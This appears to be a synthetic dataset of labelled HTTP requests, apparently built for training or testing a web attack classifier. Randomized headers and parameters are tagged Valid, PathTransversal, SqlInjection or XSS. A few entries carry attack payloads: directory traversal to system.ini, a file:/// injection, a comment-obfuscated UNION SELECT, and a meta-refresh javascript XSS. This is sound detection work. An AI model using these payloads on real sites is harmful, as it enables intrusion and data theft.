Upgrade: hht/4.9, pisd/0.7, ngc/6.5
Warning: 407 www.oa9bah.css "UfvriEEf" "Thu, 30 Apr 09 22:42:10 GMT"
X-Forwarded-For: 43.8.248.224
X-Serial-Number: 7747668675736673
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ae=flnyowersrbdtn&pijhsn=3i6pfea&viCfehd=8934434&s2G7zyenx=3&hedaene=$i&eolwlfasse=34787&uPcXJGNnph-=astrlrrse&aodl8ehb7aNnec=17&LSdmpweH9sid=65enrechr&rfg5aa=srcpsu<qeb&oBWm=2876447&04nl=3tdr$tltt9v&rhtnceootn=419&neepANse=149

End - Id: 34233
Start - Id: 34453
class: Valid
PUT /e7@8q_YgpGJK/.Hp_@6jGyxQw6e/lT0ttpuiWR7ayigfrXe/biakhaonet1o.jpg? HTTP/1.1
Content-Length: 297
Content-Language: Ison6
Content-Encoding: identity
Content-Location: http://iiwese.uk/e9be/iulhh.avi
Content-MD5: c2Q3N3RvcnZhdnNweW9UNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Nov 07 04:53:04 CET
Last-Modified: Thu, 26 Feb 09 19:14:45 CET
Host: www.iacbI.org
Connection: close
Accept: image/*
Accept-Charset: iso-8859-5;q=0.7, x-mac-cyrillic, iso-8859-15, isiri-3342;q=0.5, windows-1255;q=0.6
Accept-Encoding: compress;q=0.1, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 123.214.67.119
Cookie: atlotjhireip= 
Cookie2: $Version="4"
Date: Sat, 24 Jun 06 11:29:01 UTC
ETag: "mLwcwC0gs5I@7VGS"
Expect: 100-continue
From: 7mfJfrJ@Etuoenx85.it
If-Modified-Since: Sat, 20 Nov 04 18:07:26 CET
If-Unmodified-Since: Sat, 21 Feb 09 14:11:41 GMT
If-Match: "dCY4F-FJAUva.NdHSWZ"
If-None-Match: "a1uIiAdu7CyfujenIu"
If-Range: "UNh22n3t@BNAm4UrVu.D"
Max-Forwards: 1214
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic Y3k0YWRhaGU6M2tlZQ==
Authorization: Basic YmF6dXdFaXA6RnlkaW9ndHg=
Range: 89576-1500,-52603
Referer: http://Ttsnno.org/erttLuu/l7scshcN.avi
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Gcciphwaiaastbori0St
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: HTTP/4.5 56.32.217.241, 5.2 225.107.44.145
Transfer-Encoding: identity
Upgrade: ntuhig/1.9
Warning: 105 137.166.167.66 "0koTah" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 170241372913166600
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

hnboq=pN&NtSrounl8mm=ie?hxselect EsiNja&J4un=a4j&NaqOxp_52Bh2K=564045&xtermn_alK1Z=410194&Aoai=mel&isoo8e4Irgp0=+f:aope k&s6ln=tdt&adl8xeo=ksda&fXIxp_RGdd9systemw=nKGCejUW&eiirI=7756117&szqian6o1e=srrtehla7rsl1sisms&di=child and6ewi<ueS/inpotdn&skr4pgtFAi=cyYIjFx0c&fawYciinie0ed=0121660

End - Id: 34453
Start - Id: 26839
class: Valid
GET /8GoiQBEPPKPjgmpW@/2kfim4t/awjYwwpuuuMFh/ZgSa/otch.shtml?h1Aa5ctAfT3ntci=su7YaS HTTP/1.1
Host: www.e3yagh.com
Connection: r9er
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 157.171.243.3
Cookie: tlx6=34426165;nne5a8cnt8t=gacceptntmetaaiN3gnootl;lrk9i=2s;0bedetne9emf2m=/trtana
Cookie2: $Version="80"
Date: Fri, 05 Jun 09 09:24:52 GMT
ETag: W/"FN_WsDbwTuhE8n_G"
Expect: narnunp=svtEad
From: vteseoi@repl.biz
If-Modified-Since: Thu, 29 Jun 06 10:22:54 GMT
If-Unmodified-Since: Tue, 17 Oct 06 19:39:19 CET
If-Match: "TVJbBzCgps.vHr82GS7"
If-None-Match: "t17rJFZCF0J0sj9fjh"
If-Range: Thu, 16 Jul 09 07:46:05 GMT
Max-Forwards: 1952
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: icsdhi oa4t6eae=etIi
Range: -6214
Referer: /qnpstf/el03.asp
TE: deflate;q=0.1,chunked;q=0.2
Trailer: Trailer
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 1.0; to-ac; rv:6.8.0) Gecko/43918583
UA-CPU: StrongARM
UA-Disp: 5606,5500,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9604x4951
Via: 7.6 www.ytsr.tiff:19
Transfer-Encoding: gzip
Upgrade: advoos/2.4, 1dhv/7.1
Warning: 855 www.dtdM.css "hEinhst6Myta1ro6" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 333154589
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26839
Start - Id: 45306
class: PathTransversal
GET /sav6e1hti/Hc7dteditDeiLo/04UL/cbHAIz4eoe7toennbc/taCdgtd/olSEFE9MLVS-q/agA9mP7Jfq/nGV3/sZLL007n/B1X/epszpNL.A.css?50tn1vptaTysn4=eeen%3Bueetx%7C&tifn=8949232986&fliufu=sObnHwcaepDernroo&EKbYcopk_Gut=hiEso&nrod=1565&BtstjtDqsnnta=enajr9n&fance=rmtElrijea&118cQyvscriptpb=e_lQeZMnzag&pn1oi8e1=7234844&rprnett9rhhy=tuh&foHinm9pta9=s0snel83ola&pst3ihawa=o6ZdSdW78&e1sspysreeg=323 HTTP/1.1
Host: 156.79.158.237:7753
Connection: fbt7
Accept: audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Client-ip: 149.238.74.231
Cookie: wgetumK9bQh@P=i239gwoQ;PdgW8SYj_DB=..\..\..\..\..\..\..\..\..\WINNT\system.ini
Date: Thu, 28 Sep 06 04:57:22 GMT
If-Match: "XsPVET9y4pZvyFSm"
If-None-Match: *
Max-Forwards: 3
Pragma: no-cache
Authorization: etnset tesflfN=iiln
Referer: http://afeg.be/dharCie/fiilrrA/ltzti.sh
TE: gzip;q=0.1,trailers
User-Agent: eu6tabtm http://www.FhRot.org
Via: ilg/5.0 www.tncoxT.htm, 7.0 www.f9tHhac.shtml, 5.9 www.f7epwsya.jpg
Transfer-Encoding: compress

null

End - Id: 45306
Start - Id: 28815
class: Valid
GET /eal7/ZvlibAlallWZFWaincludeDwh/eatesehcrmMei/Fj-4/ekhoL.6giBlZxm5BUxZ9/tu/EOasraehbqit/oscnhueu/I_wxl/n@MIARIF1opeAJke09.asmx?Madsftrk5=%3Edah&Clog4_rmochaMR96i=ntti%3Enm%3CSiedElike&rtnFoblIltqnr=between%3C+s&VYJx1=acM0S1B&ehE0=3082719&ss@KgvFlocation=61908755&Rhtnitdwmesw=6&lstlim=kas_CXU12Y.Y&uu2Ayi=71602 HTTP/1.1
Host: www.najn2iele.cz:80
Connection: keep-alive
Accept: application/*, image/gif, application/zip
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 177.57.100.186
Cookie: OKi1ieItE=nneynstnr
Cookie2: $Version="138"
Date: Tue, 29 Jan 08 23:44:31 GMT
ETag: W/"G3JsTl.Rmp6k_7ruQU"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Sun, 27 Nov 05 20:55:02 CET
If-Unmodified-Since: Fri, 26 Sep 08 17:25:49 CET
If-Match: "rrNrjg6L87b_vXB"
If-None-Match: "zbsklkXt3M-d5gzxpU"
If-Range: "INchvn4BBleEr6vB0iFZ"
Max-Forwards: 718
MIME-Version: 3.0
Pragma: bnmwanl=nsNEd
Proxy-Authorization: hdae faMstat=0egsty
Authorization: 6Aeom ieno=Sadjabn
Range: -928062,21307-
Referer: /r8eh/ponw/hepz.bin
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 6.0; de-hn; rv:0.4.0) Gecko/53787807
UA-CPU: 68000
UA-Disp: 587,522,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 405x937
Via: 5.0 www.ltIlgiF.shtml
Transfer-Encoding: Rmidss; cn521eth=ydNpn
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 591 www.2iae.css "moahvhy6y9oI" "Fri, 27 Jul 07 17:55:14 GMT"
X-Forwarded-For: 26.164.27.111
X-Serial-Number: 39502
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28815
Start - Id: 14304
class: Valid
GET /dT7euabtanou3mnOecR/eicNHFjEoAT_6Cq57/no8in/hVS6Xit5Nj8Q8_q/em3p5fsEzoelytdSaoo/btyeC/ejORCmZge@lr88/SPDxgK.o@y/pp6k-Hw1l2EX.js?dbtotehehuh=nnlltts&9AB0Ea=gn&Ibnaop=ehtuac&bpdxd=tao1tlapniBnheCoy&TeLjmn=o0ZAr-r&jqio3hkqa3edal=oocpace&_m9VaD__@P0=hSvbscript+n&wmCn=%40idivtmpnedeh12t&Oxrt24r=978581713 HTTP/1.1
Host: 205.90.216.251
Connection: ux7A
Accept: */*;q=0.6
Accept-Charset: cp-936, iso-8859-7, big5;q=0.1, x-mac-greek;q=0.2
Accept-Encoding: 
Accept-Language: HmeaHeae-Sve
Cache-Control: ghnregt='doamit'
Client-ip: 18.153.158.142
Cookie: iFuoha1bA6a=11088979
Cookie2: $Version="46"
Date: Mon, 18 Jul 05 19:27:49 UTC
ETag: W/"0Rl7VLkN37lA7LREvy"
Expect: aibdaKe
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Sun, 04 Dec 05 19:27:49 CET
If-Unmodified-Since: Fri, 13 Nov 09 07:13:00 CET
If-Match: "nSTzX3iDZm21BRL36n1"
If-None-Match: *
If-Range: "VHi6H0O-0yJX_6-"
Max-Forwards: 03
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: ui0hae s6yRyaz=a0uhr
Authorization: h9t9P li6ostnn=shuijdf
Range: 61-,43-,51336-
Referer: /susf/nIBo/siuhgnhe/Itaho/hinwoet.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: sjfndd-Q http://www.8le8.st
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 007x8553
Via: 9.1 www.rJhm5o5.css
Transfer-Encoding: compress
Upgrade: dUtttn/9.4, 1s6f/3.9, oer/8.1
Warning: 948 75.211.234.239 "dffhhie0act" 
X-Forwarded-For: 130.188.8.33
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14304
Start - Id: 21220
class: Valid
GET /wSd6gA.p6iRIgb3jENoe/uoZYjHAA/t@zQZ4GgfqC62k5/oFA43MKUHs/npsieaVumphnn/w6anjvXev99kAu/dsDYcJBmGspj/zei/RS3rCK1dkb/tkQYFzxA8yL.t/nJCdzOCzzhxN/htuhNinhn.jpg? HTTP/1.0
Host: www.1yftida5ie.fr
Connection: fsptst
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=100
Client-ip: 94.29.16.110
Cookie: Sbin2z3=am&t
Cookie2: $Version="232"
Date: Wed, 12 May 04 13:38:18 GMT
ETag: "XkIZDNh-6SXE0Tg9Qam"
Expect: oybtosee
From: vEvaeak@i1auid.st
If-Modified-Since: Sat, 14 May 05 04:01:53 GMT
If-Unmodified-Since: Tue, 29 Jul 08 11:30:29 GMT
If-Match: *
If-None-Match: "4KBGVEl0ei4T.WpZ"
If-Range: *
Max-Forwards: 7681
MIME-Version: 6.1
Pragma: sZhrI='6'
Proxy-Authorization: NTLM eGVyZ3VybWRlc2ZsZmFkZnNvdG9haVd2NW5pNThzdXJzdHBldA==
Authorization: Digest nc=0fb7AfdE
Range: 6-557772
Referer: http://enrl.it/ertag.php
TE: trailers
Trailer: Upgrade
User-Agent: tvE1Iz http://www.ee5sttc.cz
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: 8.4 www.teIftth8.jpeg, 0.8 221.214.122.243, sFta/0.7 43.15.5.239
Transfer-Encoding: identity
Upgrade: paa/5.3, a9Au/8.0
Warning: 474 205.133.110.111 "znelncj" "Mon, 25 Jan 10 21:18:40 UTC"
X-Forwarded-For: 235.168.20.114
X-Serial-Number: 51497571
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21220
Start - Id: 35397
class: SqlInjection
GET /traabnshvtorciickqR/nSta94Tngudiagwcb5sf/jetkjolifpttsIoi/dnhemrrbHpth/UZm6zretcD-GN/duefsnhmapyadt/f4hrUB3M6wY1w.xMwC2/vQZ312NhPEdopJDM/mpE5NEI@j.asmx?trsetmayo=%27++%29++++UN%2F**%2FION+++++ALL++++SEL%2F**%2FECT+++%27Sin%27%2C1%2C34752%2C%270ne%27%2C9+++++FROM+++++4titn0m+++++WHERE+++++%28+%27%27++++%3D++%27&lFxrNupsenasx=shuenae HTTP/1.1
Host: www.3ewdhmo.cz
Connection: eatei
Accept: text/plain;q=0.3
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.6
Accept-Language: hji6-k, n26ot-s;q=0.5
Cache-Control: max-age=9
Client-ip: 61.188.211.30
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="4"
Date: Thu, 31 May 07 16:20:24 CET
ETag: "w.bssa@znOLYSv9"
Expect: tqnkotl=tntt5;qeotah=wGst
From: raeiOige@2salo.it
If-Modified-Since: Wed, 16 Feb 05 23:51:31 UTC
If-Unmodified-Since: Thu, 11 May 06 05:38:56 CET
If-Match: "gvTqse70AntOD3v"
If-None-Match: ".W7y.k4T7aE0ITJ.U"
If-Range: "5LkSCrlPbaT_H-Ke@"
Max-Forwards: 1
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: Basic aUEzb3BhcjpUZWN0M2U=
Range: 24492-281270
Referer: /deooLN/ceiey/c3ms.exe
TE: trailers,trailers
Trailer: Pragma
User-Agent: hbXFRT http://www.falhr.org
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 177x860
Via: 7.9 155.11.91.69:9235, FTP/1.6 www.thpzsDe.jpeg:7
Transfer-Encoding: zsrg; eekne=uNvccIa
Upgrade: nk2i4r/2.9, ipzf/4.9
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35397
Start - Id: 11846
class: Valid
GET /Abfer8cj/0P3includehtaccesVZAeval-/ap.jpg?tdbeiern=H9&eeeisoede=etoOcc&inliia=gnBeh HTTP/1.0
Host: 196.154.128.106:80
Connection: close
Accept: image/*, audio/basic, image/png
Accept-Charset: isiri-3342, iso-2022-jp;q=0.6, utf-7
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=6034
Client-ip: 18.97.57.49
Cookie: dtrtIa7ftas=e-3bBM1hAvxv;d5eimnnmmdejrI=3238;ad7orfeUiqlma=hlOaeHxa?gvbscriptnhn;i8ijtcoPstSar0g=hAd aticeebstdinrtaetcpe;l9IbseaarT8ma=a1ND
Cookie2: $Version="06"
Date: Fri, 17 Feb 06 20:28:13 UTC
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: 100-continue
From: tettqfmr@aac7ikiH.biz
If-Modified-Since: Fri, 07 Jul 06 19:14:35 GMT
If-Unmodified-Since: Tue, 29 Aug 06 08:23:45 CET
If-Match: *
If-None-Match: *
If-Range: "JAl2h8dgjsFhhZeKR54s"
Max-Forwards: 9
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bmE4SnVlb2xuWWVmZXNPb2NwOWg3emVvbmdjY2Vhd2ZnYWFhb2xl
Authorization: NTLM aWlybjhscmJtYTdocm9ubGd1aW5mZHRhdEdhYWhvYXlqcnFlZWVubA==
Range: 58-5013
Referer: http://wai2ti.ch/llcS0/taldumi/Uetehl/A8fsws/nupte4.jpg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.6 (compatible; MSIE 7.4; Linux i386; nbae3g; odrsds4)
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 045x0190
Via: 3.0 210.145.181.112, dhMjn/9.4 www.xiansd.gif
Transfer-Encoding: identity
Upgrade: qeona/2.2, e3aae/0.6
Warning: 315 www.oatloe.css "eSpaaytaurstt" "Thu, 12 Mar 09 20:27:38 UTC"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 3151909596780283547
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11846
Start - Id: 14055
class: Valid
GET /sHiR/4oYaeip/6avE9/k-NdzP@LXh/zspLehs/m@@h/2me0fshsr/rijc4_x4cyKaoDl-Gsc/eyC-1irhC6oprhqUO8X1.jpeg?evsnee=pcertMohiframenph-ni HTTP/1.1
Host: 76.127.208.194
Connection: mpreyo
Accept: text/html, text/*, video/mpeg;q=0.8
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: gzip;q=0.5, deflate;q=0.7, identity, identity
Accept-Language: 1mtu0a-bvgibte, Fs1XtrO-n8P;q=0.5, cncnmmc-r1;q=0.9, 75haml-zq
Cache-Control: max-stale=29337
Client-ip: 234.224.59.200
Cookie: 01XWvrda=esm6-Ih-LuR;f5f=nEXen;erarTp=sSptd7E;rxh=ajideElsE8noein;a9e9tnlpiihwa=tedypnnF4;rteiMssGlo=236
Cookie2: $Version="304"
Date: Tue, 10 Aug 04 08:39:44 UTC
ETag: "SWtDsXUVFoys_8bcY"
Expect: 100-continue
From: ersWoye@CaetbWt.gov
If-Modified-Since: Wed, 20 Jul 05 09:35:44 UTC
If-Unmodified-Since: Mon, 11 Dec 06 02:48:12 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 22 Aug 08 06:15:40 UTC
Max-Forwards: 42
MIME-Version: 2.6
Pragma: jardukis=0
Proxy-Authorization: NTLM OG9zZXlhOHNlZWxlaXRDNGpydGFFb05sNUUxdHI0YWRUczhuOHVJbGh5
Authorization: Basic TWgyY2lnOmtlZWNjbQ==
Range: 477582-,-394214
Referer: /ihypank/la9nO/7ytxa1A/outM.cgi
TE: trailers
Trailer: Trailer
User-Agent: oLcu (oSZ27yh8; dA97xHA89s; wBmwIcE; h18qeD9z3t)
UA-CPU: StrongARM
UA-Disp: 091,777,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9552x9727
Via: FTP/1.3 www.aole.png:80, 7.0 www.GaIo.tiff
Transfer-Encoding: nW8enh; hwnesn=rygPdAhh
Upgrade: iQr/6.2
Warning: 980 www.mem2oh.html "iEatsey" "Sat, 25 Sep 04 08:44:30 CET"
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 0043438224132828242
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14055
Start - Id: 44819
class: PathTransversal
GET /t1tE/nR.cfm?chtn=cn%24cstaselectw+o2&rpbteeaqtd0o=%27%5Chihlsli+t9%2B%24%401%24&ruohD6oZieslo1=hlnmxssntoghaRdoIa&vhnoeerruseszrs=597818&n5ati3Ott0ftfp=95557&nGcf=ntF&naieArhx1=19092913&eengvwatim4a2=mHUE8A&sm7t=doc%28++++file%3A%2F%2F%2Fc%3A%2Fbv%2Freuor.xml+++++%29&n2=4255&edkhhar0=68319375 HTTP/1.0
Host: 159.135.201.41
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 92.163.213.217
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="23"
Date: Thu, 28 Oct 04 21:13:03 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Thu, 19 Feb 04 11:28:48 UTC
If-Unmodified-Since: Sun, 24 Jan 10 21:56:24 CET
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "grIOzWd4mODJSc-sGhxE"
If-Range: "EXjq0t12jkaHZPYSy"
Max-Forwards: 05
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: eH4teM jsxnoc=5ihxiqi
Range: -7,891-,-651
Referer: /hjy1/neneaneO/kNmeHe/eEsd/srebo3on.htm
TE: trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.9 (compatible; MSIE 5.2; Windows NT; 0nBa; el8osg; ehl6egckyt)
UA-CPU: x86
UA-Disp: 2038,5885,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 123x704
Via: HTTP/9.9 240.52.195.67
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 13064
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44819
Start - Id: 1564
class: Valid
GET /lujiksyOZVU2@9q/ec6EerAwnpL4oUV7f/toYty85-ocqlxR/1iemeNreynnzbeicsos.jpeg? HTTP/1.0
Host: 50.149.169.20
Connection: uaeel
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=79621
Client-ip: 178.37.227.145
Cookie: Or8=c:uu ecopytteul is|4sy;4dahicartnaces=oeiymene;ottp=o8v0j2r;nL3WGPKVGbt8=\btro$u;0lp0=6bzb@L\ilsdropa ;lns=3492694
Cookie2: $Version="49"
Date: Tue, 21 Jul 09 12:03:47 UTC
ETag: W/"TcNTBE.hnvT-fkK"
Expect: uumaob=nye0d
From: tyoranj@tial.uk
If-Modified-Since: Fri, 03 Aug 07 13:37:46 CET
If-Unmodified-Since: Fri, 25 Jan 08 10:17:35 CET
If-Match: "eFzV2rRSGRFQUCW"
If-None-Match: *
If-Range: "Wvd95.lJNCecu2hKSro"
Max-Forwards: 8044
MIME-Version: 1.8
Pragma: Geud='5s4a'
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: ssdm olbrhazl=e7attr
Range: -7,52718-,3057-736702
Referer: /ecploseh/lggcItel.tar.gz
TE: trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/2.0 (Windows; U; Win98 6.1; re-ue; rv:8.9.2) Gecko/88308599
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7934x8697
Via: FTP/4.2 www.eieCar5.js, 6.6 www.espek2.html, 2.5 www.Ltmteern.jpeg
Transfer-Encoding: gzip
Upgrade: tbn/9.6, 9ao/1.1
Warning: 565 www.oaie5.css "3h4i3dbeiaed6iodoqtr" "Thu, 25 Dec 08 10:23:34 CET"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 4623775518466698
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1564
Start - Id: 22952
class: Valid
GET /de4gryean/wuyCBwDtVxaecHjSH/x4eDnmuoiwx/faerdryttolrsoiar/rCUK..zYX/ey5inris5aPturt.png?aRtiLur=1h&aIesltute=ngfrnqtiolH6N&tobiehpfneewai=caswetltj8iefmiiSA&Wtrzc9=rsynln&i6tl6wti=utmpwCS7q%5Cl&9v=ynioeoak HTTP/1.0
Host: 143.141.146.164
Connection: close
Accept: image/gif, application/rtf;q=0.0
Accept-Charset: iso-8859-8-i, shift_jis;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 67.214.101.60
Cookie: t6gonbhNj=eBP-Jum
Cookie2: $Version="2"
Date: Wed, 20 Feb 08 08:14:28 GMT
ETag: "ccKk8LrcO2k1cAc2Rtw"
Expect: lnlsts
From: wrmcT@heeEiet.org
If-Modified-Since: Mon, 10 Oct 05 02:46:39 GMT
If-Unmodified-Since: Fri, 29 Aug 08 02:09:01 GMT
If-Match: *
If-None-Match: "6Agu-BhhPEyDhM5"
If-Range: *
Max-Forwards: 500
MIME-Version: 1.1
Pragma: eIoreos=dap
Proxy-Authorization: Digest username="snietTsh"
Authorization: NTLM c3hkbHlwdHNuaG9tcWllYTVsdGZlaG5odDdubDF0QWRyb2t1RTk=
Range: -294148
Referer: /rn3sres/d8nut/4Yehica5.nsf
TE: trailers,chunked
Trailer: Pragma
User-Agent: asrre9a/8.7.3.8.7
UA-CPU: 68000
UA-Disp: 164,400,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: 4stcm/0.9 75.243.201.129:94136
Transfer-Encoding: identity
Upgrade: rnr2u/8.9, NBtv8d/1.1, cmOm1/0.6
Warning: 349 167.176.37.95 "eumteoh1rgy6orin" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22952
Start - Id: 12078
class: Valid
GET /EiGWMhtpass2A/1eba7NbgrIorit2n/smFfWy2h-G-dMzWt2Tc/eHgzaER9d6LHJcTPu/nsKPW/ineae5iLbfenx6tEdo/fubgXgDZCp.5N.aspx?yr=746&frEg=tseohl&te=pih&yO=Trbtbconnect&rqicweNi=9336122 HTTP/1.1
Host: www.diAarbaeoo.biz
Connection: mtas
Accept: application/*
Accept-Charset: big5;q=0.3
Accept-Encoding: gzip, deflate;q=0.5, identity;q=0.6, deflate, gzip;q=0.1
Accept-Language: koarap-reS;q=0.2, rr-sa3br;q=0.3, mTa-ltoc;q=0.0, nepddt4-0e4rg;q=0.4
Cache-Control: no-cache
Client-ip: 136.6.185.125
Cookie: ao0adr=t|shutdownoota9b (;akcOeosntny=loOhstyleOhf(utye;positionVis=3729
Cookie2: $Version="08"
Date: Mon, 05 Feb 07 10:00:11 CET
ETag: "dXpI4cLssmr0mH-UnG"
Expect: onaNtti6=wymieb
From: teftsnmu@ndtrss.cz
If-Modified-Since: Wed, 17 Feb 10 06:44:21 CET
If-Unmodified-Since: Sun, 10 May 09 15:40:11 CET
If-Match: *
If-None-Match: *
If-Range: "xtOYyI-k6hQ8VDElc1w5"
Max-Forwards: 4798
MIME-Version: 2.4
Pragma: yrn='e'
Proxy-Authorization: NTLM bjV0bmludXJhR3BuZWlkYXRkb21ub25lbFpsbm50U29jaXZqYXNlZg==
Authorization: Basic c2Vhc2JhOnJvdG50
Range: 86737-87721,-9149,666-
Referer: http://www.57evrir.cz/oslpn/ekneete.ace
TE: trailers,trailers,gzip;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/6.6 (compatible; Konqueror/7.6; WinNT; tstltse; mtsa; TLEcsoat7s)
UA-CPU: MIPS
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: sis/6.2 144.13.182.3
Transfer-Encoding: compress
Upgrade: trt/8.9
Warning: 066 www.zaynf.html "odsompreoosngeawd" "Sun, 21 Jun 09 24:00:24 GMT"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 494716334072
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12078
Start - Id: 47060
class: XSS
GET /moyn4rolva/dSYMWwp0.aspx?Opselect_@O=e&IrnGDM8qy=e3hcGrsueTT&Snv0ne=ni%3BxO&yecopy1kyhlZYa=%3Cmeta+++++http-equiv++%3D++%22++refresh+++%22++content%3D++%22++++0%3Burl%3Djavascript%3A+++%5Balert+%28%27qaocl%27%29%3B%5D++++%22%3E&eznt=elsfbdsetvjldeotNs+3 HTTP/1.1
Host: www.nhrong.be
Connection: keep-alive
Accept: text/*, audio/*;q=0.3, application/*;q=0.3
Accept-Charset: x-mac-ce, cp-950, windows-1258;q=0.8, x-mac-cyrillic;q=0.8
Accept-Encoding: deflate;q=0.4, gzip;q=0.3, identity;q=0.1, deflate;q=0.7, deflate;q=0.4
Accept-Language: *
Cache-Control: vnOnv='aiaAN'
Client-ip: 127.63.46.215
Cookie: 5Eyigdriltexre=h&t;shhfnp=orc;iiadmnoenKeeb=ssamrAhdocumentht;t4hem5eroent=30;sa=eNanD3rejYK;qini=651755667
Cookie2: $Version="08"
Date: Tue, 01 Sep 09 04:45:50 CET
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: ctya@sr6jtHsrss.cz
If-Modified-Since: Sat, 17 Nov 07 22:56:28 UTC
If-Unmodified-Since: Tue, 13 May 08 01:00:36 UTC
